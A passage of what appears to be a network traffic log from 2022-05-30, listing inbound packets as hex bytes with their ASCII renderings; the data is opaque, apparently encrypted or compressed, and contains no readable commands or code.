6e a8 52 c7 9e c0 1a ae 9d 56 a3 25 de 77 7c b0 1d a4 9a 75 61 05 2e b5 Data Ascii: T,1rFcw3](~N%kcKdF#F#qb-En+Iuh_YTx H-GRlC.NX5q#\Y/YU''[p)$[$5a'w9@<{[\@'8+%3jK3q^.nRV%w\|ua.
2022-05-30 12:45:08 UTC	357	IN	Data Raw: 7a 97 15 b6 3a 03 a3 e2 2a ce e5 a0 89 fc 37 98 50 96 b5 61 1f 8c 45 c3 74 9c 34 84 2b 61 02 98 5b 36 ff 6a 03 f7 1c eb 76 90 6f ff c5 ad 65 02 55 f2 32 20 a1 c0 e4 e2 36 59 c3 47 f7 bf 53 d8 75 60 1c 9d 07 fc 13 02 4b 4e da a0 70 aa a8 59 c0 14 96 a1 33 6d ab ed e0 19 5d 1a 4a 07 4e 97 73 2c 29 63 4e 3f 55 27 31 f4 1c fe 33 da 65 ef f7 7d 25 15 29 d8 18 5f 92 67 c3 9c cf fe 3e d6 72 bb 8c 59 8f 02 8f 7b ac d5 eb 84 6e 72 ce 4e 9b 47 a5 25 68 9c 39 84 f4 be 1d 59 2c 9b e4 e2 a0 1a f5 df 53 16 d5 56 78 87 55 fe 2e b0 ea d6 aa 3a c7 99 58 26 7f 03 f3 33 6d 0a 41 ca 85 d6 43 c4 3e 24 77 19 42 b5 67 41 03 43 da 00 95 9b cc 3c 93 a3 2c cd b7 1b 44 42 21 4a 3c 8a b6 29 c6 ec d3 20 2e 21 33 d8 f5 08 06 65 a5 e0 b4 23 fe b3 54 8c 2e ec cd 8b b5 f2 65 5f ab 81 03 Data Ascii: z:*7PaEt4+a[6jvoeU2 6YGSu`KNpY3m]JNs,)cN?U'13e}%)_g>rY{nrNG%h9Y,SVxU.:X&3mAC>$wBgAC<,DB!J<) .!3e#T.e_
2022-05-30 12:45:08 UTC	358	IN	Data Raw: b6 e4 cb 9c 17 ff e4 1b 4a 82 56 aa 9b 2a fd b6 3b 1f 47 41 fb 98 d6 24 21 69 d1 99 a8 f6 e1 92 ac f5 ae 7d 59 ba ec af 14 d2 43 15 dc 1f 14 f6 01 97 41 5f bb d9 1f 3c e7 12 91 eb f5 99 b4 f2 88 52 ce aa 51 50 80 14 54 05 8a 22 97 18 9e 17 07 d6 5b d9 ae b8 1a 52 13 a0 2b 44 8c c2 1e 86 f4 a1 94 b5 ff e1 10 a7 73 1b a3 00 f7 41 4c 5d ac 05 50 c3 6b aa e5 88 de d0 85 09 31 a3 65 c0 b2 60 1e cd 7e 36 ad 3f 2f e5 72 bf 7f d9 b5 a1 3b 46 fa f0 f7 1b 4a 8e 70 6e 58 47 5e 79 a6 a2 f6 01 00 40 b1 a9 2c 3d 98 94 3e 85 93 f9 1b 22 c6 51 fd 5a d9 2e 88 04 de 93 c1 b3 99 f5 be 58 ea 17 db c9 e9 9a 58 f6 37 e0 b8 cc 2f b0 d0 d0 91 34 37 8b 3c 83 e1 37 7d 4e e4 e5 db 51 da bf dd 4f cd 7f 3e 0f e4 ef 5b b9 f7 6f 56 46 da aa 2c 49 b9 e3 8d 0e 2f f0 94 93 1b ff 4f bb 07 Data Ascii: JV*;GA$!i}YCA_<RQPT"[R+DsAL]Pk1e`~6?/r;FJpnXG^y@,=>"QZ.XX7/47<7}NQO>[oVF,I/O
2022-05-30 12:45:08 UTC	360	IN	Data Raw: 8a 84 15 1f 5e 14 f9 6e 3f 51 c0 5e 00 b1 e8 2e 47 c9 db 3f 07 cb 64 b8 35 d0 01 bc 3d 32 a1 12 ce fe 4b 6c 50 b6 22 3a f0 90 f2 3e 07 c3 45 1b 3c 9d 77 d9 bf b7 69 6f b7 17 0f fa d2 88 ca 6b 75 67 d1 39 b6 67 86 fd 17 a5 7d 43 d3 48 00 7a 57 93 8a 56 92 98 19 8f dc 9e e2 d7 6e db 99 86 0e e3 e1 03 e9 d9 42 8a c0 1f 1d ba c2 d7 cd 2e b3 bb 00 09 e7 b3 05 2d ef 24 cb 3a 25 44 2f eb ae 33 1d 4c c2 84 1b 0b e5 bb 87 94 4c 17 15 c5 c7 38 ef 05 4a 02 77 7f 0f 64 33 64 13 ed 53 25 49 fe 37 8c b4 0c 8e 61 40 68 b3 04 7e fa 46 8b 4b c7 a0 02 c3 10 15 c3 a5 bd e4 0f db e1 ab 26 a7 52 e7 9a 85 57 4d e9 d2 60 69 ad f4 dc b8 60 d8 97 43 a9 9c c9 0c b5 10 6a a0 e7 56 79 8d 85 dd 83 95 c5 0d d9 03 f5 50 e9 3d 38 b1 21 ac 22 26 42 82 a6 d5 1a 73 f8 46 96 67 a4 e7 12 95 Data Ascii: ^n?Q^.G?d5=2KlP":>E<wiokug9g}CHzWVnB.-$:%D/3LL8Jwd3dS%I7a@h~FK&RWM`i`CjVyP=8!"&BsFg
2022-05-30 12:45:08 UTC	361	IN	Data Raw: 52 96 42 37 ec 58 8f b2 a0 57 ee 1c a1 2e 25 17 7e f0 8a a9 d8 11 3b 35 ee e8 55 38 83 fe 33 67 4f 4e 4d 31 a8 d7 14 46 63 3c 05 32 1e e6 e5 a5 7b 4f 19 31 0a 5d c6 06 2e b2 e1 01 5e 6e 81 3b fd 51 1c 12 c5 91 fb fd 44 20 95 1e 53 03 65 41 df f8 97 79 e6 16 b1 b6 a0 43 ec a9 a5 46 c5 ff b5 53 3b d5 2b 49 a1 fe da fc 9f e6 19 61 72 a6 e2 df d6 63 0c 32 a4 ea 0a 37 50 c1 93 8c f7 9e 1c e9 31 4a 0f 59 3e b9 90 32 bc 5a 19 99 91 69 24 9e fc b6 9a f4 5f 01 1a 4f c6 c4 97 47 7b 6b b7 80 09 26 b3 b5 5b 3d 32 ea 8c 10 c0 cd c2 b6 c3 43 81 c2 cf 47 b9 33 ce fd bf c2 94 ac ba c3 05 98 85 df 63 b1 bd d4 93 31 ff 84 04 4d d7 03 a8 a0 78 55 a6 9b 4b 8e 48 2b ef 1c 72 b7 93 72 f8 75 b7 b1 81 ef 08 7c 77 06 a7 84 76 1f 6a 14 fe 6e 2a 51 d0 5e 1d b1 e8 2e 6a c9 b7 3f 65 Data Ascii: RB7XW.%~;5U83gONM1Fc<2{O1].^n;QD SeAyCFS;+Iarc27P1JY>2Zi$_OG{k&[=2CG3c1MxUKH+rru\|wvjn*Q^.j?e
2022-05-30 12:45:08 UTC	362	IN	Data Raw: 3c 18 00 61 ad 36 03 8a 2a d7 71 2a 78 15 d4 5e 03 66 59 1b 8e 20 d3 3d 93 bb ec 81 25 16 3c 26 d4 1d cd 4c f2 cd 2a 47 fc 4d 36 e6 33 f3 1e f3 fe 2d 20 11 63 00 13 e7 16 51 c9 76 78 10 4b cc 44 0d 4b 5c 5f f0 aa 78 79 54 06 dc a7 0c 59 02 d4 1a 1d d9 e8 9b f0 6e 5e 31 a2 2b 31 83 83 74 1e 87 33 42 f8 a9 23 ae b3 56 bb 33 ea 48 28 53 7e 07 18 cb 04 de 93 a5 f2 58 57 75 72 8c c4 67 ef 0c 72 d8 ab e6 22 b1 58 ed c6 99 52 d2 9d d0 f2 76 95 23 15 e7 3e 32 05 34 6e 2f 45 f5 14 bf 3d ad f0 ff f3 17 9a 46 35 c7 b1 0d 3a d5 86 d1 e8 9d 0f 9e b3 63 51 b8 3b f0 d4 80 8a dd c5 9c 73 ef 7a 15 81 3e 0a 39 dd 5a dd 49 bc aa 11 88 33 f3 a0 c6 d8 ed 80 3e 1b f2 12 35 fa 50 6b a8 99 48 b8 0e fb 1e b0 79 c6 c7 90 e9 6f 37 dd 58 a2 b2 60 28 ee 1c c0 2e 55 17 e7 0f a7 a9 b5 Data Ascii: <a6qx^fY =%<&L*GM63- cQvxKDK\_xyTYn^1+1t3B#V3H(S~XWurgr"XRv#>24n/E=F5:cQ;sz>9ZI3>5PkHyo7X`(.U
2022-05-30 12:45:08 UTC	364	IN	Data Raw: 4c d3 1f f4 98 17 c8 7d 21 97 27 65 0f 34 e1 ef 31 ff 98 7b e8 b9 fb 90 a5 6e b6 99 e7 4f 8d ac 2e e9 aa 42 fd 90 76 50 c9 c2 a4 cd 2e fe bb 4d 60 c8 c1 61 44 8b 57 e4 52 5c 69 56 8e ae 5d 1d 2b a6 e8 7f 62 81 c8 e3 fc 60 17 35 ac 8a 4c a2 64 07 6e 3a 16 2f 05 57 0a 77 c0 7f 56 69 89 4e e5 cd 7f f7 12 39 68 b3 6a 36 95 0e f9 71 b0 cd 67 ae 77 2f aa d6 dc 97 61 db e1 ab 48 a7 3d e7 e8 c1 b7 08 8c 9a 90 2c c4 b8 2a fd 0e 88 2d 06 cb c8 31 49 de 48 90 e5 86 0a 82 c8 85 bd 14 d0 ab 65 21 46 87 20 09 78 5d c9 d1 e9 4b a2 b4 c7 c8 45 a0 36 96 de 78 22 ca 43 ea d0 26 d0 e0 eb e9 60 de 74 cd e8 60 66 85 72 cc d7 9e 0a f9 94 f1 80 fe 74 34 3b a7 43 a4 45 b6 af 4e a0 a3 f4 94 6e 87 fa 8c d7 fc 75 05 1b a2 27 00 61 ad 36 70 8a 52 97 18 2e 1e 1d b5 5a 78 6e 31 1f af Data Ascii: L}!'e41{nO.BvP.M`aDWR\iV]+b`5Ldn:/WwViN9hj6qgw/aH=,*-1IHe!F x]KE6x"C&`t`frt4;CENnu'a6pR.Zxn1
2022-05-30 12:45:08 UTC	365	IN	Data Raw: 61 a1 fe 94 88 33 54 b8 76 3f 2e 54 2a f2 97 a6 0b cb 73 81 d7 a0 43 ec dd c4 34 b5 96 dc 3d 16 bc 46 2d d2 9f f7 98 e8 c6 70 47 1c 86 cf ab a5 0c 69 50 c7 8b 7f 50 22 ae fa 8c 83 eb 65 87 1c 23 7c 2d 47 dc e3 56 c8 77 7c f2 fc 00 42 f0 89 d1 f4 90 3c 6e 6e 22 af c4 f8 47 15 1e c4 ee 24 4f df c1 6a 58 1f 8e bd 3d ed be f2 c2 c3 22 81 b6 aa 22 c1 40 ba fd 92 c2 f9 ac c9 8b 8d dd f2 9a 0a ff d3 81 be 31 94 d8 c4 08 a5 46 c6 ee 1d 00 ca 9b 78 0e df 6e c2 59 02 f9 f2 27 9b 75 dc 15 45 aa 6f 39 12 48 8a c5 15 1f 1f a8 29 2b 58 1f b5 12 73 f3 9c 2e 47 05 7e 7a 54 8e 01 f6 45 93 75 bc 58 d2 69 57 ac a4 2e 24 22 fe 22 3a bf 78 34 7b 73 99 2a 53 5e d4 12 d9 cd 47 cc 2a f9 54 60 b2 a4 db af 6b 18 67 15 7c d3 3d f4 b5 17 ed 7d 43 97 6c c3 3f 34 d0 ef 1e ff cb 7b 8f Data Ascii: a3Tv?.TsC4=F-pGiPP"e#\|-GVw\|B<nn"G$OjX=""@1FxnY'uEo9H)+Xs.G~zTEuXiW.$"":x4{sS^G*T`kg\|=}Cl?4{
2022-05-30 12:45:08 UTC	366	IN	Data Raw: 5c 5f f0 32 d5 16 30 60 dc a7 0c c1 2e b0 7f 65 a9 e8 9b 00 4e 3d 50 c0 58 31 83 83 2b 76 fe 43 2d 8c a9 23 c8 de 39 df 33 ea 48 28 35 0c 62 58 f8 04 de 93 fa 8b 68 6f 69 f4 42 3b c7 69 9d 7d 87 38 76 ba 2c a7 12 c9 c6 3c b7 e5 a4 93 10 11 79 67 e7 3e 26 05 34 9e 98 0e 4f eb 5d c2 52 0f 0c b8 ad 65 a3 ca 38 4e e2 bf f7 0c 2d 97 45 5a 35 b8 86 55 70 33 9b 78 23 49 d6 7f e0 d8 5d f9 8e bb be 88 e7 60 e5 13 8a e1 d6 eb 78 71 dd 46 fd 6b a8 80 cb e4 0d ed c6 49 15 6b e7 de 5d 4f a5 49 5b b0 69 c6 c7 60 8a dc 72 dd 5d a2 b2 90 73 5d 59 c0 30 55 17 17 dc 14 ec b5 03 48 35 c3 d8 91 7d ea de 5d 67 62 7a 8c 74 dc db 77 46 0c 04 c4 77 7b ed c8 a5 15 0f de 74 7f 48 b5 06 4b fa 20 44 73 72 f6 3b 94 01 c1 57 a1 88 94 fd 33 78 0b 5b 3f 12 54 41 f2 98 15 3c cb 0e 81 b6 Data Ascii: \_20`.eN=PX1+vC-#93H(5bXhoiB;i}8v,<yg>&4O]Re8N-EZ5Up3x#I]`xqFkIk]OI[i`r]s]Y0UH5}]gbztwFw{tHK Dsr;W3x[?TA<
2022-05-30 12:45:08 UTC	367	IN	Data Raw: e7 62 c4 bb d5 90 60 17 91 ac cf 38 95 01 07 02 8a 16 6a 64 6f 60 77 ed c3 4c 2c fe 77 88 cd 0c 3f 08 7c 68 89 00 36 fa da e2 34 c7 f6 06 ae 10 cf aa 93 bd a9 0b db e1 47 4f e2 52 d8 9e c1 c0 f0 80 df f7 6c a9 b8 4b f9 0a cd 00 47 ad c8 5e 59 df 0d fd a6 e3 0a ee d4 ef f8 14 94 c1 65 4e 72 9f 65 7e 3d 3c c9 b6 a9 48 e7 d5 81 a2 45 8d 7a 92 9b 01 65 a0 43 85 88 3e 95 93 a2 86 60 de 10 d7 ad 0f 2c f3 72 b8 a7 81 4f 9e df 80 80 9b 08 2d 7e c2 0f 8d 45 d4 27 56 e5 c2 ba ea 6e ee 6e 8a 92 95 3a 60 1b cc 87 6a 24 ad 66 07 8a 22 3b 13 6b 70 4f d8 5a 0b d6 33 5a 82 7e d7 39 9f 77 86 c4 25 41 38 26 d4 cd 57 36 8d 95 1b 85 94 8c fe 79 3c 5f 24 b3 01 22 b5 ab 9c 94 f8 98 16 51 a2 33 78 7c 5f cc 44 1d 20 19 5f 71 36 b8 79 48 6d 99 a7 0d c9 42 d4 32 76 9c e8 9f 08 11 Data Ascii: b`8jdo`wL,w?\|h64GORlKG^YeNre~=<HEzeC>`,rO-~E'Vnn:`j$f";kpOZ3Z~9w%A8&W6y<_$"Q3x\|_D _q6yHmB2v
2022-05-30 12:45:08 UTC	369	IN	Data Raw: e4 b9 e3 32 ac 2b 39 99 31 69 42 9e f9 c7 b1 f4 90 01 6e 4f d3 b5 bd 47 dc 6b c4 80 ac 57 9a b5 f8 3d 1f ea 29 61 a8 cd 48 b6 c3 43 21 b3 ef 47 04 33 ba fd 3e b3 bc ac 7d c3 28 98 4a ae 4f b1 05 d4 be 31 50 f5 24 4d 75 03 c6 a0 cd 24 8f 9b 33 8e 7a 2b 1e 6d 47 b7 32 72 9b 75 34 c0 a5 ef bc 7c 12 06 22 e1 50 1f 16 14 8c 6e ac 20 f0 5e a2 b1 9c 2e 47 bb 9e 3f 89 cb 01 b8 49 a2 30 bc 8f 32 cc 12 b4 8c 6b 6c e8 b6 22 3a 9b e2 d4 3e c6 c3 2a 1b 6e ef 57 d9 0c b7 69 6f c5 65 25 fa 70 88 af 6b 50 15 f6 39 77 67 f4 fd 43 d7 38 43 3a 48 65 7a 54 e1 aa 56 20 98 7b 8f d5 ec d5 d7 fd db 99 86 37 91 e9 03 09 d9 42 8a 14 6d 15 ba 79 d7 cd 2e 6e c9 08 09 06 b3 61 2d 17 56 a1 3a bd 44 56 eb 06 41 58 4c 7d 84 7f 0b 35 c9 a6 94 be 17 35 c5 4a 4a e7 05 de 02 3a 7f e3 16 12 Data Ascii: 2+91iBnOGkW=)aHC!G3>}(JO1P$Mu$3z+mG2ru4\|"Pn ^.G?I02kl":>*nWioe%pkP9wgC8C:HezTV {7Bmy.na-V:DVAXL}55JJ:
2022-05-30 12:45:08 UTC	369	IN	Data Raw: 24 d2 fe f7 88 9c a3 70 e2 1c a6 cf 97 c2 26 69 0f c7 ea 7f b7 56 84 fa 0a 83 9e 65 d1 7b 0f 7c 62 47 b9 e3 be bc 1f 7c 1d fc 69 42 7e ef f3 f4 c4 3c 01 6e d7 db 81 f8 da 15 6b c4 24 50 63 df c2 6a 3d 1f 5a c9 55 ed b8 f2 b6 c3 ff f5 87 aa 12 c1 33 ba 0d f7 87 f9 be c9 c3 28 50 86 9a 0a 27 d3 d4 be e5 e0 c1 61 19 a5 03 c6 40 69 10 ca 0c 78 8e 7a d3 a7 59 02 a4 f2 72 9b 99 a8 f4 e0 62 6f 7c 12 16 ed c1 15 29 1f 14 8c 96 2c 14 b5 20 73 b1 9c 2e 21 8c db 2b 54 cb 01 bc 30 95 75 ea 58 32 cc 1a ca bb 2e 79 22 b6 22 2a ca d5 91 69 73 c3 2a 07 2b d8 12 41 cd b7 69 47 8c 52 60 76 a4 88 af 53 6d 22 b3 a6 d3 67 f4 b5 62 e0 7d eb 97 48 65 6a 52 d6 ef 40 ff 98 7b d7 cc db 90 8f 6e db 99 9e 29 a6 ac 14 e9 d9 42 ee e5 5a 50 e3 c2 d7 cd 6e 99 fe 4d 35 c8 b3 61 5d fe 61 Data Ascii: $p&iVe{\|bG\|iB~<nk$Pcj=ZU3(P'a@ixzYrbo\|), s.!+T0uX2.y""is+AiGR`vSm"gb}HejR@{n)BZPnM5a]a
2022-05-30 12:45:08 UTC	371	IN	Data Raw: a9 93 4a 8c 56 bb 33 ea 48 98 b7 41 07 20 88 04 de e9 41 cd 58 6f 36 8d 73 41 7c 2f f3 7d d8 54 19 9b aa 98 12 c9 99 52 d2 db 34 cd 76 65 1c 15 e7 2a d6 3a 34 9e 10 ba 0a ff a4 fd 52 0f 80 0c e8 87 5a f5 38 4e 72 0b b2 ee d5 a8 45 5a a1 0c c3 e7 8c 0c 9b 78 bf fd 93 cd 10 e7 5d f9 2a 0f fb 0a 25 5f e5 13 76 53 93 69 95 4e dd 46 f9 d8 ed d2 25 db 0d ed ca fa 50 39 0b e1 5d 4f b1 fa 1e 94 9a f9 c7 60 96 6f 37 f9 bb 9d b2 90 57 ee 1c 36 cc 6a 17 17 f0 a7 a9 43 f3 77 35 c3 e8 22 38 20 1c 62 67 62 4e 3f 31 16 35 48 46 0c 3c 77 32 e5 04 f7 a5 15 4f 6d 31 e1 bf 8a 06 4b b2 93 01 07 8c c9 3b 94 51 72 12 d5 73 ab fd 33 20 b8 1e 75 e1 6b 41 f2 f8 a6 79 81 f4 be b6 a0 43 ec a9 e4 a4 8a ff dc 53 16 d5 66 ab ed fe f7 fc e8 e6 88 80 23 a6 cf df a5 63 91 d3 f8 ea 7f 37 Data Ascii: JV3HA AXo6sA\|/}TR4ve:4RZ8NrEZx]%_vSiNF%P9]O`o7W6jCw5"8 bgbN?15HF<w2Om1K;Qrs3 ukAyCSf#c7
2022-05-30 12:45:08 UTC	372	IN	Data Raw: 01 e2 4e 38 36 f6 41 bf 26 c0 2e 3d 9a e0 4d 95 3e 26 a7 32 db 61 3e 8e 27 1e 04 a5 7c f4 a4 15 09 b7 31 90 b8 87 18 bd c8 92 e5 96 7b 06 fe 5f 93 6e d1 da 0a ba d2 ee 27 cc 33 fa 5b 50 ee aa ed b9 50 05 c9 b6 6f d6 6d ce 23 99 c1 a7 38 41 08 6e 25 99 43 59 90 9b 8b f0 0f bd cd 14 66 69 3d e7 4a ca 72 9c e3 89 e2 3d 70 bb e4 1f 83 d4 92 8d 61 b4 45 b8 d7 29 70 2a 10 d1 4d d8 ca 30 17 24 4d 59 1b 08 bc 26 0c 87 d3 3c 43 ab 61 11 0c 72 2d e1 5a f3 72 8e 8e ee cd ec a7 f1 85 3d 2e 5e f6 00 26 d0 24 66 23 26 2a 20 7f f7 09 62 46 5e ef 1c b3 19 f6 75 6c 72 1a c3 26 50 8b c5 4e 7a 32 66 cc 7c f7 b5 1e 71 16 0d 88 1e 93 95 8b 54 22 fc 42 d4 1a 1d d9 e8 6b 3f 11 5e 31 a2 ab f1 6c bc 74 1e 87 33 42 7a 46 1c ae b3 56 bb b3 ae a7 17 53 7e 07 20 48 03 31 ac a5 f2 58 Data Ascii: N86A&.=M>&2a>'\|1{_n'3[PPom#8An%CYfi=Jr=paE)pM0$MY&<Car-Zr=.^&$f#& bF^ulr&PNz2f\|qT"Bk?^1lt3BzFVS~ H1X
2022-05-30 12:45:08 UTC	373	IN	Data Raw: 7d f0 1c 2f 3b fb 26 61 9f d1 cc ff aa 47 de 93 bb 46 34 fd 89 77 f0 b7 76 01 ce e2 0a 31 8f b7 0d 7f 38 bb 68 9b 6f be 54 21 57 68 ca 1b 4b 0e f1 c1 72 23 e7 ac dd e6 0c 62 92 8c e0 ef c6 1e e2 af 39 bb 51 45 0a 3a 63 7f 68 6c b5 5e 8b fe f4 4b f1 f6 74 00 fd 46 f3 3c 75 ed 75 bc 05 01 70 0b 15 c1 51 92 21 5b a0 5a 9b ad 91 7e b3 14 93 dd e5 a2 4a ff a8 f5 81 d8 bc 2a 60 7a 78 69 dd 19 a6 58 ef 9b e0 44 5d d3 5d 98 7d 83 99 ca b2 f6 f4 ac e9 54 4b 89 be cc 8c a3 90 17 5d e1 16 5a 8e dc e0 77 84 72 ce d3 d5 22 50 fa 6d f0 b7 05 3d 84 fc 2b ad 4e c0 86 8c 19 e4 3a 28 08 00 9d 6a 0c 6d c3 3d a0 e0 c8 cc 86 e3 f4 f0 73 7d 05 4f 07 ca 33 58 7c ee ba 07 59 57 04 0f 02 db 22 ae c1 b6 6a d0 55 1d e7 76 55 b3 84 f5 00 57 c7 b9 f8 ba 48 1f 41 fc 9f 95 80 97 cf 77 Data Ascii: }/;&aGF4wv18hoT!WhKr#b9QE:chl^KtF<uupQ![Z~J*`zxiXD]]}TK]Zwr"Pm=+N:(jm=s}O3X\|YW"jUvUWHAw
2022-05-30 12:45:08 UTC	374	IN	Data Raw: 0c 69 6f cf 0b 62 33 0c 9e be 8a 1e a9 80 5c 6f 9f 37 53 02 fd e3 a5 7f 80 d1 29 95 ae 24 f0 89 4c 22 50 cb 53 93 1f fa 53 c0 96 46 99 08 93 0e 96 64 d1 77 fa f0 1a 96 74 02 80 0e 3b 4c 75 59 b0 d2 5d 2b 6f f7 e0 51 dc 34 5e e8 2e e0 3f dd f3 78 21 4d a7 e9 d8 ef 18 99 0e 57 2b 18 65 45 d9 03 49 f3 3f b1 e2 3f ef 95 c0 83 4e fa e9 02 05 50 10 f2 6d d1 24 40 e9 fa 80 0d ab b4 31 60 66 bf b3 ec 72 f2 22 6a 34 db f8 9f 0f 77 20 ea cd 1a b8 45 a6 d9 70 4c 6c f9 6a fc f3 6f a6 c6 db 68 99 ee 16 55 02 ab 97 83 3e 43 ea 2b 25 06 7f ba 8f 62 a5 c3 21 3b 6a 43 b7 88 77 9b 08 e8 39 17 29 54 1c 4a 5e fd 67 6c 24 8d f5 ff 74 49 b8 03 63 23 89 b6 8b 35 8a 05 a9 f0 41 12 ae 2a 95 51 85 3d 24 66 69 29 0a 0e d9 55 a1 d1 93 da d7 47 f0 fe 81 c2 c1 b8 6c 50 7f 42 51 e0 6d Data Ascii: iob3\o7S)$L"PSSFdwt;LuY]+oQ4^.?x!MW+eEI??NPm$@1`fr"j4w EpLljohU>C+%b!;jCw9)TJ^gl$tIc#5A*Q=$fi)UGlPBQm
2022-05-30 12:45:08 UTC	376	IN	Data Raw: b8 c4 46 d6 22 a2 d5 c7 e6 48 7d 09 f8 de 01 22 a4 4e 75 ef 54 d0 93 eb 42 6c 2e 4b bd e8 0f 66 77 7e 48 e8 eb 0a 9e 94 c4 8c 6b 4b 47 3b c2 43 89 49 24 90 3c a0 c2 f4 2e 65 1e c5 e0 d7 95 75 e4 10 3c 18 00 61 ad 36 43 81 d2 a8 79 2e 70 1d dc 51 fb 51 59 1f 82 28 13 33 6f 8c ec 81 25 16 bc 2c 24 22 3d 73 8d cf 5f 8f 64 53 94 3c 3c 3a 20 b9 f1 ed df ee 9c ff 3c 91 e6 6e c9 76 78 10 db c5 b4 32 4b 5c 5f f0 72 b1 89 6b 06 dc a7 0c c1 4b 24 25 1d d9 e8 9b c0 19 ae 0e a2 2b 31 83 03 7c ee b8 33 42 f8 a9 63 a6 43 69 bb 33 ea 48 28 5b 8e 38 20 88 04 de 53 a2 02 67 6f 36 8d 73 bb 9f e0 cc 7d d8 54 19 9d 49 57 2d c9 99 52 d2 9d d7 02 49 65 1c 15 e7 fe 34 f5 0b 9e 10 ba 0a 6b 46 32 6d 0f 80 0c e8 25 bf 3a 07 4e 72 0b b2 0c 30 67 7a 5a a1 0c c3 95 6a c3 a4 78 bf fd Data Ascii: F"H}"NuTBl.Kfw~HkKG;CI$<.eu<a6Cy.pQQY(3o%,$"=s_dS<<: <nvx2K\_rkK$%+1\|3BcCi3H([8 Sgo6s}TIW-RIe4kF2m%:Nr0gzZjx
2022-05-30 12:45:08 UTC	377	IN	Data Raw: 03 18 54 22 14 8c 38 42 ac ee dd 4c ce 7d b9 93 8a c8 c9 68 cb 01 82 55 3f cd 3f 67 59 35 44 43 0a d9 25 1f b6 22 8c 4d 73 84 ba 4c 39 d8 0c a6 48 4b 91 f0 b7 69 97 38 cc 12 7e 9b 9c de d4 ff 53 94 02 ee 67 f4 d3 69 73 b2 c7 a8 e9 8e 64 09 03 bc 61 c2 98 7b 07 9e 4a bc 52 51 ec 23 7e e7 bb 0c 20 d4 d9 42 be 2e cb d9 3f fd 94 07 f2 95 57 8f 3e f5 b3 61 4f c9 fc 02 bf 63 80 a4 47 eb 2e 6d 0f 9b 84 7f 49 35 65 a0 12 5f 30 9e f7 f2 21 c9 38 3a 02 3a 7d 3b 8c f7 e2 48 21 c7 72 3c 65 54 cd f0 0c f7 19 54 ac ba 73 89 de e7 46 27 7d ae 47 13 10 2f 0f 47 77 3a 79 64 aa 1c e0 fc f2 46 ad 7c c0 08 75 dd 38 7d db 07 2e d9 eb e4 fa 1d ef 75 5e 49 55 c6 2f 10 92 b5 3e b1 1b 69 9b 2c 8d d8 4e 46 79 47 aa e1 4d 76 ca 65 9a 65 76 e2 ef f8 8d 36 6c 0f d5 1f d1 fc 3b 62 6b Data Ascii: T"8BL}hU??gY5DC%"MsL9HKi8~Sgisda{JRQ#~ B.?W>aOcG.mI5e_0!8::};H!r<eTTsF'}G/Gw:ydF\|u8}.u^IU/>i,NFyGMveev6l;bk
2022-05-30 12:45:08 UTC	378	IN	Data Raw: a0 7a c0 e2 58 a2 b2 10 63 fb eb ff 2e 55 17 17 c3 b2 5e 8a 11 48 35 43 d9 37 cf d5 fe 5d 67 22 7e 2a c6 e3 d7 77 46 cc 12 62 c5 44 e6 c8 a5 55 62 78 c6 40 5d b5 06 8b 99 86 f6 4c 6e f6 3b 14 7b 67 e5 9e 91 94 fd 33 09 ad e9 00 03 54 41 72 df b3 8e f4 16 81 b6 a0 65 f9 5e fb 46 b5 ff 1c 77 03 22 79 49 d2 fe b7 df fd 11 4f 61 1c a6 0f fe b0 94 56 32 c7 ea 3f 17 37 36 c5 8c 83 9e a5 f7 09 bd 43 59 47 b9 63 2f dd ad 43 99 fc 69 42 82 9c 41 cb f4 3c 01 ee 55 ba 33 c7 47 15 6b c4 99 31 d1 e0 b5 6a 3d df fd a8 e7 d2 cd f2 b6 83 55 94 35 95 47 c1 33 7a e9 87 35 c6 ac c9 c3 68 8b e7 28 35 b1 d3 d4 7e 20 81 73 5e 4d a5 03 46 b0 08 a2 f5 9b 78 8e 7a 24 d7 eb 3d b7 f2 72 1b 78 c9 46 df ef 6f 7c 12 0a 9f 73 2a 1f 1f 14 4c 64 4d a6 8a 5e 73 b1 dc 27 52 3e e4 3f 54 cb Data Ascii: zXc.U^H5C7]g"~wFbDUbx@]Ln;{g3TAre^Fw"yIOaV2?76CYGc/CiBA<U3Gk1j=U5G3z5h(5~ s^MFxz$=rxFo\|sLdM^s'R>?T
2022-05-30 12:45:08 UTC	380	IN	Data Raw: a6 15 96 92 36 03 8a 22 16 6c d9 4f 1d dc 5a 4b ee 4c e8 bd 28 d3 39 1f cc f9 76 1a 16 3c 26 14 63 28 84 b2 cf 1f 85 94 12 81 cb 03 3a 20 b3 41 af ca 19 a3 ff fc 98 d6 2d dc 81 47 10 5b cc 44 71 5e ab 60 f0 32 b8 39 2f 13 2b 98 0c c1 42 54 60 08 2e d7 9b 00 11 9e 48 b7 dc 0e 83 83 74 1e fe 26 b5 c7 a9 23 ae f3 2e ae c4 d5 48 28 53 fe 70 35 7f 3b de 93 a5 32 2e 7a c1 b2 73 3b 98 50 85 68 2f 6b 19 dd 4e 27 67 dc 6e 6d d2 9d d0 32 02 70 eb 2a e7 3e 32 05 40 8b e7 85 0a eb 40 82 21 1a 77 33 e8 65 b9 4a 4a 5b 85 34 b2 0c 36 57 34 4f 56 33 c3 55 6f 33 ea 6d 48 c2 93 7f f3 98 2d ec dd 30 fb 88 c6 a0 8a 06 81 6c 93 eb 76 71 b2 53 0e e7 ed 80 c6 a4 63 f8 3d c5 50 6b e8 5e 30 5a 46 c5 1e b0 79 06 ab 75 61 50 37 dd 58 a2 de 85 a0 d1 1c c0 2e 15 7c 02 07 98 a9 b5 11 Data Ascii: 6"lOZKL(9v<&c(: A-G[Dq^`29/+BT`.Ht&#.H(Sp5;2.zs;Ph/kN'gnm2p*>2@@!w3eJJ[46W4OV3Uo3mH-0lvqSc=Pk^0ZFyuaP7X.\|
2022-05-30 12:45:08 UTC	381	IN	Data Raw: f7 87 f8 c2 eb 57 03 8a 61 9f 22 47 34 93 ef 62 d9 38 76 b0 0b 93 2b 36 6b 3d dd bb 4f e3 ac d7 ce 99 4c b5 5f f4 84 ad 46 4a 88 13 fe bb 4d dd e1 b3 6e 12 ac 74 14 3f 23 8e a3 d7 ae 33 1d 92 8d 44 70 34 e7 4e d7 56 d1 74 76 f8 8a 38 a2 fe 11 42 2a 40 5e 33 54 b5 19 96 44 18 69 fe 4e 53 da 9c e7 5e d6 0f f0 24 a8 93 36 b6 71 c7 cd f4 b6 e0 3f fc ce ac cf d6 90 73 ef 1b a7 52 e7 8e db 90 19 d6 dd cc 9d a3 50 19 df 5d 88 00 06 9e d3 ee 58 8a e8 c5 2b 66 39 d2 84 b8 bd 14 d0 a4 79 5e 54 ca 2d d7 0a 7e 1b 3e a2 1f a2 d5 c7 f8 58 ed 24 c7 31 5e 27 f1 8a 9a 